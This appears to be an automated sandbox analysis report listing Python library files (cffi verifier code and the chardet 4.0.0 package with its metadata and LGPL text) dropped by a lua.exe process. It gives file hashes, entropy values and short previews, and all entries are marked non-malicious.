Preview:	#..# DEPRECATED: implementation for ffi.verify()..#..import sys, os..import types....from . import model..from .error import VerificationError......class VGenericEngine(object):.. _class_key = 'g'.. _gen_python_module = False.... def __init__(self, verifier):.. self.verifier = verifier.. self.ffi = verifier.ffi.. self.export_symbols = [].. self._struct_pending_verification = {}.... def patch_extension_kwds(self, kwds):.. # add 'export_symbols' to the dictionary. Note that we add the.. # list before filling it. When we fill it, it will thus also show.. # up in kwds['export_symbols']... kwds.setdefault('export_symbols', self.export_symbols).... def find_module(self, module_name, path, so_suffixes):.. for so_suffix in so_suffixes:.. basename = module_name + so_suffix.. if path is None:.. path = sys.path.. for dirname in path:.. filename = os.path.j

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi\verifier.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11513
Entropy (8bit):	4.406500312259876
Encrypted:	false
SSDEEP:	192:Ff47QNsfPKrJ3G68sRtTdXtONPNB/CV3tQGD8//5/C/0pJYSP7qS1W7du:Ff4EyfPckKNdGL/lvYcG0Wk
MD5:	D3E534BC2B599AA72EF7BE30813DAAA6
SHA1:	E8527E4978CAF14776D48FC3DC2E686667AB087A
SHA-256:	2DAF2B75B124BDDBDBA801C3CD393996C354BDD92A07F19C1673BBC1723A3209
SHA-512:	8E0284B922DD6E58954274AFDBAC305B13D013150047CAABF4614E06B198376F24C8C54B59F8D25ACB076E6366D3E2CE84749E2651CAAC9C48D4AC04707E7D22
Malicious:	false
Preview:	#..# DEPRECATED: implementation for ffi.verify()..#..import sys, os, binascii, shutil, io..from . import __version_verifier_modules__..from . import ffiplatform..from .error import VerificationError....if sys.version_info >= (3, 3):.. import importlib.machinery.. def _extension_suffixes():.. return importlib.machinery.EXTENSION_SUFFIXES[:]..else:.. import imp.. def _extension_suffixes():.. return [suffix for suffix, _, type in imp.get_suffixes().. if type == imp.C_EXTENSION]......if sys.version_info >= (3,):.. NativeIO = io.StringIO..else:.. class NativeIO(io.BytesIO):.. def write(self, s):.. if isinstance(s, unicode):.. s = s.encode('ascii').. super(NativeIO, self).write(s)......class Verifier(object):.... def __init__(self, ffi, preamble, tmpdir=None, modulename=None,.. ext_package=None, tag='', force_generic_engine=False,.. source_extension='.c', flags=None,

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet-4.0.0.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet-4.0.0.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	26432
Entropy (8bit):	4.61315802555607
Encrypted:	false
SSDEEP:	384:X/56OuAbnn0UX+X6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7upt0MZuQ2:X/5trR+DnFMz1ReScmc7GtXZuQ2
MD5:	A6F89E2100D9B6CDFFCEA4F398E37343
SHA1:	545F380FB332EB41236596500913FF8D582E3EAD
SHA-256:	6095E9FFA777DD22839F7801AA845B31C9ED07F3D6BF8A26DC5D2DEC8CCC0EF3
SHA-512:	DC4177806315B4CE888798EB5E643BF16B162418ECD10B5E7E9B4E0DF3E17D11E77E402F8BF0A1CC127D870F212A4A67F588F6750F49340997234360E69CAF08
Malicious:	false
Preview:	.. GNU LESSER GENERAL PUBLIC LICENSE... Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.]..... Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who decide to use it. You.can use it too, but we s

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet-4.0.0.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3526
Entropy (8bit):	5.168152585552706
Encrypted:	false
SSDEEP:	96:DmikLegiQILjaaxmPktxsxy13uGWtM1wJDf1Q7IOpGNM:+Le8wsa+Gf1sZ5OpG+
MD5:	2A7F45FB349FFB79B73F78C1B4B3D2B0
SHA1:	ACFA39A144417C56A3D84D0137A68EF410695853
SHA-256:	C92610004ECD3E6DCBC3180CA858B5CDD2D0E3C9A6C0C6EB270A80582B5C6C7F
SHA-512:	23B5CE9F55102BBBF619798426258F40333EC212CEFEDA6AA0408EC97D7FEBAD57C2008E8936B36FB13BF12316B157E63062F237EA309A282BFD81BC7CF090E9
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: chardet.Version: 4.0.0.Summary: Universal encoding detector for Python 2 and 3.Home-page: https://github.com/chardet/chardet.Author: Mark Pilgrim.Author-email: mark@diveintomark.org.Maintainer: Daniel Blanchard.Maintainer-email: dan.blanchard@gmail.com.License: LGPL.Keywords: encoding,i18n,xml.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL).Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet-4.0.0.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6358
Entropy (8bit):	5.693933960950543
Encrypted:	false
SSDEEP:	96:sFnCX1j7px1UtIJv3lvv4TQXO3Wra/kIRaJhtztCLIRMyGBnERebSf4Z3SsIGSOH:s1CX1xx1oIJvfO7/EEhI1mWe
MD5:	6B3254C5690D5A315410456A5957BF81
SHA1:	9A466B1FA62B6DACA536123531D0A1045C703698
SHA-256:	A4E926EEAD253295E2CE74ABF5FBA36F535BFADDF8843AD78C54D451F51F14ED
SHA-512:	2730E7EC11699955CE4E1BF84F454C0163E70BECB2F07520CE755148B0E40EE47E0F01F828756678230150C13417082FD0DFABEE2B5F44814D924A723230A72D
Malicious:	false
Preview:	../../Scripts/chardetect.exe,sha256=bkCIK2y00WtRhSR3OksF4zaho74nJY44OekSFToPubI,97130..chardet-4.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..chardet-4.0.0.dist-info/LICENSE,sha256=YJXp_6d33SKDn3gBqoRbMcntB_PWv4om3F0t7IzMDvM,26432..chardet-4.0.0.dist-info/METADATA,sha256=ySYQAE7NPm3LwxgMqFi1zdLQ48mmwMbrJwqAWCtcbH8,3526..chardet-4.0.0.dist-info/RECORD,,..chardet-4.0.0.dist-info/WHEEL,sha256=ADKeyaGyKF5DwBNE0sRE5pvW-bSkFMJfBuhzZ3rceP4,110..chardet-4.0.0.dist-info/entry_points.txt,sha256=fAMmhu5eJ-zAJ-smfqQwRClQ3-nozOCmvJ6-E8lgGJo,60..chardet-4.0.0.dist-info/top_level.txt,sha256=AowzBbZy4x8EirABDdJSLJZMkJ_53iIag8xfKR6D7kI,8..chardet/__init__.py,sha256=mWZaWmvZkhwfBEAT9O1Y6nRTfKzhT7FHhQTTAujbqUA,3271..chardet/__pycache__/__init__.cpython-37.pyc,,..chardet/__pycache__/big5freq.cpython-37.pyc,,..chardet/__pycache__/big5prober.cpython-37.pyc,,..chardet/__pycache__/chardistribution.cpython-37.pyc,,..chardet/__pycache__/charsetgroupprober.cpython-37.pyc,,..chard

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet-4.0.0.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.816968543485036
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVii6KRRP+tPCCf7irO5S:RtBMwlViGjWBBwt
MD5:	D25A99ECD1ECB535EE4E31874B0C7B95
SHA1:	B80780FBBF97A5FBF433C4F692E340632EA675F1
SHA-256:	00329EC9A1B2285E43C01344D2C444E69BD6F9B4A414C25F06E873677ADC78FE
SHA-512:	539E072414E6E8AD3BFAEDB0587507443B39826814FB330B57D605FB5FBE61134D3548359F41A14CC63B44E23EF0AA1E62EA1C4A2F3B344BE548F4C2C8143976
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.35.1).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet-4.0.0.dist-info\entry_points.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.160324136950664
Encrypted:	false
SSDEEP:	3:1GvAr8vLGCeZAO0vn:1u7L6Zv0v
MD5:	B65F7BFDE70CE91F668944119FDF1923
SHA1:	529FC858FDFDA889EAA5EAFC9CB699C4305B19D6
SHA-256:	7C032686EE5E27ECC027EB267EA430442950DFE9E8CCE0A6BC9EBE13C960189A
SHA-512:	CB56AE858AA2E45A4AB8ED228D3C2BEE810428BA9492EC3EB024CC7F6B8A874A8D59FECF93528D2B327D4066B47B2B87B66B9CDBC8AD231D9E7D490F8F92803D
Malicious:	false
Preview:	[console_scripts].chardetect = chardet.cli.chardetect:main..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet-4.0.0.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:Z0vn:uvn
MD5:	DFA288092949BE4DED87CFE9BE2702A5
SHA1:	AD425BF5119CE57A37E3FA126DB0D4DCACB05013
SHA-256:	028C3305B672E31F048AB0010DD2522C964C909FF9DE221A83CC5F291E83EE42
SHA-512:	55C6E553FA35EC923208B4DE293B332A5B2B4B7B014423EE133BB21E43A39B8755AE24B80AAE5255B6BE8864680B9EDEB234D8E0D7CBE5DC4A90639FCF620CB0
Malicious:	false
Preview:	chardet.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3271
Entropy (8bit):	4.647327189615612
Encrypted:	false
SSDEEP:	48:g0uwyUjHSnvi/dSMLACrCBnPRy6sJBMLACrCBnPRC6ayTL2Dg7fkQeUp8Mxyd:9u4GGdSMbJBM9o/eUp8/d
MD5:	2FC59815B38752DB9228D08EA57393D2
SHA1:	528941E0635B972612867CEDB7C1DE455E307416
SHA-256:	99665A5A6BD9921C1F044013F4ED58EA74537CACE14FB1478504D302E8DBA940
SHA-512:	03807B23F91CEEBC533B81C80745114EEB97098BC7658B6DFAF547BBB146B77AC395482F63E8DE5E3ED680C095A7011E77241C800E42CBDDE6AC41D44D9A69E3
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to the Free Software.# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA.# 02110-1301 USA.######################### END LICENSE BLOCK #########################...from .universaldetector import UniversalDetector.from .enums import InputState.from .version import __version__, VERSION...__all__ =

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\big5freq.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	31254
Entropy (8bit):	3.8805955906579896
Encrypted:	false
SSDEEP:	768:8u4PjuVhktU0mk0X5oUdVmPLg6BSjvzwjgebYX7VqM1H+n5:8AzktUc0X59dVE+jvw8cM14
MD5:	14C69F7CCF62A473CAF8D24A85302168
SHA1:	4028BD63B9EB6C3225FC61B7E8733528EE80FD87
SHA-256:	0FFCCAE46CB3A15B117ACD0790B2738A5B45417D1B2822CEAC57BDFF10EF3BFF
SHA-512:	7584191B735F623535D25AFD962A80069C6083AD408E8DB6381E238B993209F530D1792B866643DEE2CCDE9191B3B44EDBDA347940E6432A4B29FD0E38C9034F
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\big5prober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1757
Entropy (8bit):	4.96764341536432
Encrypted:	false
SSDEEP:	24:vZixsiaiq5E807yRiyUVOkH/HqTbVB+HWRTB2i2A2Rs7ay/D:vsx/1ef0uwyUjHSvT2i2tD2D
MD5:	1A45BD1F7CE22E30EEC32D870AB02E44
SHA1:	5297DF2758B6BE575459E08565B07382EB6D52ED
SHA-256:	901C476DD7AD0693DEEF1AE56FE7BDF748A8B7AE20FDE1922DDDF6941EFF8773
SHA-512:	202F2F681B84A872FE767DC7B42E2B3162E4019BFA97F5C5471CAEB5C222BE7282F692E2A56532D90A94A3355F96275362B291AEBEBA102B8377FE9886021AEA
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\chardistribution.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9411
Entropy (8bit):	4.862229966867439
Encrypted:	false
SSDEEP:	192:kt17u43bbWNinqFlBv9Ekv9fRFUv9rYfj9ivt9uczv9Yh:8u4HWNEqlBFEkFfRFUFMfRivj5zFYh
MD5:	1348267FC095CAE77B3F24A48DD6ED06
SHA1:	DB44178E9A4908F7256C85A75A7374FB57BF868F
SHA-256:	DF0A164BAD8AAC6A282B2AB3E334129E315B2696BA57B834D9D68089B4F0725F
SHA-512:	F11D2C26226D95142251F3C5C3AA2B2D7C3F40E7C7C191ABCAF14325E76F5C3EA47A1532AF970A214C45864908D936337524EB41C90880464868A54F230C5A65
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\charsetgroupprober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3839
Entropy (8bit):	4.452953563997799
Encrypted:	false
SSDEEP:	96:vst17u40JbBxS8EBpSL7eQXa3hgX+IFWXqjuAuYKKv:kt17u48LHNfeFwZ
MD5:	E7F08780A8FB42F77C61315AD721763F
SHA1:	10E9716409D7710FA9C3950B485C8A14576A7EE0
SHA-256:	1992D17873FA151467E3786F48EA060B161A984ACACF2A7A460390C55782DE48
SHA-512:	DC53994C455B281114DCD1307C11CC69FD41912FBBB033B5A59DD331A7F9633738B8871E489C3CECC56230D6781E6038FA6BE5E131D38B7C54B794CA6063832D
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\charsetprober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5110
Entropy (8bit):	4.607059113006975
Encrypted:	false
SSDEEP:	96:Ptzcu40B0KIYY6PG/Gyf0LGszdQjq/qbRAdkvSQ0B8E:Ptzcu4lKHuizdQdG
MD5:	A257430E4394E805107C519BA417C3D4
SHA1:	4CAC3F02D5FDAA8776B49966206247ACD3BD151E
SHA-256:	2929B0244AE3CA9CA3D1B459982E45E5E33B73C61080B6088D95E29ED64DB2D8
SHA-512:	EEE24BB77D3F2981C15BA577FBDD2A092A3A786B8CE99B56D204214C737B8EBA2CD380E8FBC10CC9BD758C949A79626912B57482EE099EA0E43448DCE295BE37
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\cli\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:v:v
MD5:	68B329DA9893E34099C7D8AD5CB9C940
SHA1:	ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC
SHA-256:	01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
SHA-512:	BE688838CA8686E5C90689BF2AB585CEF1137C999B48C70B92F67A5C34DC15697B5D11C982ED6D71BE1E1E7F7B4E0733884AA97C3F7A339A8ED03577CF74BE09
Malicious:	false
Preview:	.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\cli\chardetect.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2711
Entropy (8bit):	4.411874613721609
Encrypted:	false
SSDEEP:	48:Ono2sJX3o8g2zwYV+714Vl/7H1vbbxEJPzFN2+jRYNvexZgOa1:uo9o8jwLCTFPyPxNBja+qOM
MD5:	B881B0F0856FDC622FD7435E6F35ACE1
SHA1:	CF118AF9F5BD309964839FE3DD147790C65A4BA6
SHA-256:	9143DE4028BEA2539B5E93AAE4CB652AE067D44535F6B91E7A700CC3197B5116
SHA-512:	6952F825F8A6DF3847711B4C2BA3EFB4E309F4AB6FB7D2EDCB5F5FBC59568259D6961DC7D66A4DE487F311C53FED430A1C1009305B3EC08AB8A9F3451103EF06
Malicious:	false
Preview:	""".Script which takes one or more file paths and reports on their detected.encodings..Example::.. % chardetect somefile someotherfile. somefile: windows-1252 with confidence 0.5. someotherfile: ascii with confidence 1.0..If no paths are provided, it takes its input from stdin..."""..from __future__ import absolute_import, print_function, unicode_literals..import argparse.import sys..from chardet import __version__.from chardet.compat import PY2.from chardet.universaldetector import UniversalDetector...def description_of(lines, name='stdin'):. """. Return a string describing the probable encoding of a file or. list of strings... :param lines: The lines to get the encoding of.. :type lines: Iterable of bytes. :param name: Name of file or collection of lines. :type name: str. """. u = UniversalDetector(). for line in lines:. line = bytearray(line). u.feed(line). # shortcut out of the loop to save reading further - particularly u

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\codingstatemachine.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3590
Entropy (8bit):	4.62398833547819
Encrypted:	false
SSDEEP:	96:Kt17u4ZvK9RfAbiAgdoWnS38L8oxInSOrM+l84bMSmg0:Kt17u4dK9Re2y+wodj+0
MD5:	33C5E712BAD7523F996BFA09D85EB5BF
SHA1:	3E2B59C552B7E985F2EFEE068ABA34A0C7938409
SHA-256:	558A7FE9CCB2922E6C1E05C34999D75B8AB5A1E94773772EF40C904D7EEEBA0F
SHA-512:	CC5CAD5F2E7BAE182FAA81CEEB8FB780883B528E4858A9708A07DFB1C2D7C09819C2699013FAD7FFC5AF09903DA3C86EE1C31CEBC61E555C45C1E0D517ACF399
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1200
Entropy (8bit):	4.868809040509225
Encrypted:	false
SSDEEP:	24:GXN807yRiyUVOkH/HqTbVB+HzC0GAaM0RmWeqQo:D0uwyUjHSqCjAaMom/qz
MD5:	EBCC3FE46560E1E5C7CA6E347780A828
SHA1:	F229B8B6C252A0ECA565CC8601ABF090AE0EF818
SHA-256:	E34CEBEB0202670927C72B8B18670838FCAF7BC0D379B0426DBBEDB6F9E6A794
SHA-512:	6F1DAA1D2B4C00D001F9EB320479D7C2E84DCBFE8DEDFCACF84A4A3FF82105C17DED710B3E446159D62219E088F098A344032AE2AEC7A90EC811FB09507D4285
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# Contributor(s):.# Dan Blanchard.# Ian Cordasco.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to the Free Software.# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA.# 02110-1301 USA.######################### END LICENSE BLOCK #########################..import sys...if sys.version_info < (3, 0):. PY2 = True. PY3 = False. s

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\cp949prober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1855
Entropy (8bit):	4.9674061820096185
Encrypted:	false
SSDEEP:	24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HDsZRuHwAysvOawK:Kx/1ef0uwyUjHSEWIHwRowK
MD5:	EAC9F36E937956F46F3E4C37F9CD7D76
SHA1:	5E1E40B592AB5BADAEBEE6D1CB845F34475BBEED
SHA-256:	4D9E37E105FCCF306C9D4BCBFFCC26E004154D9D9992A10440BFE5370F5FF68C
SHA-512:	429A0E8A95E7B0A00DC5CF08F6A19D9CAAA94B9D27443110EEFCCF5E7E6891983409D447187209D630FB21AD52D719AE0DD2F95F0274D7D0207C9F608D2EE08B
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\enums.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1661
Entropy (8bit):	4.918641425002419
Encrypted:	false
SSDEEP:	24:uKNXveYMIUPhNkBFbFWd/YMSj6YML1ShnccagRxdI5rLGkC6P:F9ve9j1d/sWChnpayXkZ
MD5:	754EAD831ACB9BA0C2E768243ADA5DA2
SHA1:	2EAF9CADC33CD208A4A0378158A07FEA397F6A91
SHA-256:	0229B075BF5AB357492996853541F63A158854155DE9990927F58AE6C358F1C5
SHA-512:	529BE8C6A49A533549DB8B41D1118F5D77780F167259095F92D8F11C5AF09039C7BB110BB56A0C6F5151174418293BA8C2D7AC2BB666B7F723160E9F066D5AA1
Malicious:	false
Preview:	""".All of the Enums that are used throughout the chardet package...:author: Dan Blanchard (dan.blanchard@gmail.com)."""...class InputState(object):. """. This enum represents the different states a universal detector can be in.. """. PURE_ASCII = 0. ESC_ASCII = 1. HIGH_BYTE = 2...class LanguageFilter(object):. """. This enum represents the different language filters we can apply to a. ``UniversalDetector``.. """. CHINESE_SIMPLIFIED = 0x01. CHINESE_TRADITIONAL = 0x02. JAPANESE = 0x04. KOREAN = 0x08. NON_CJK = 0x10. ALL = 0x1F. CHINESE = CHINESE_SIMPLIFIED \| CHINESE_TRADITIONAL. CJK = CHINESE \| JAPANESE \| KOREAN...class ProbingState(object):. """. This enum represents the different states a prober can be in.. """. DETECTING = 0. FOUND_IT = 1. NOT_ME = 2...class MachineState(object):. """. This enum represents the different states a state machine can be in.. """. START = 0. ERROR = 1. ITS_ME = 2...c

C:\ProgramData\ShellExperienceHost\Lib\site-packages\chardet\escprober.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3950
Entropy (8bit):	4.7144135499229085
Encrypted:	false
SSDEEP:	96:Kt17u4Abi3JGELunBiIn349ZX6HL6awXaUAsk2n:Kt17u4Abi51LuIIn34P6eaaV
MD5:	A43AE497CCD0D98F53E4F2E7EF5250E2
SHA1:	3F5C243F912E8E14DF288F356403A5D920159B3E
SHA-256:	924CAA560D58C370C8380309D9B765C9081415086E1C05BC7541AC913A0D5927
SHA-512:	54A4091F88901E96742A935EB6D8A18A6463B00234AD3B5A10A41376EB3AD9750E489BC782EC741BD0FAB242B3C3D84A549CA1DEEB8547AE0999A21E219C6F78
Malicious:	false
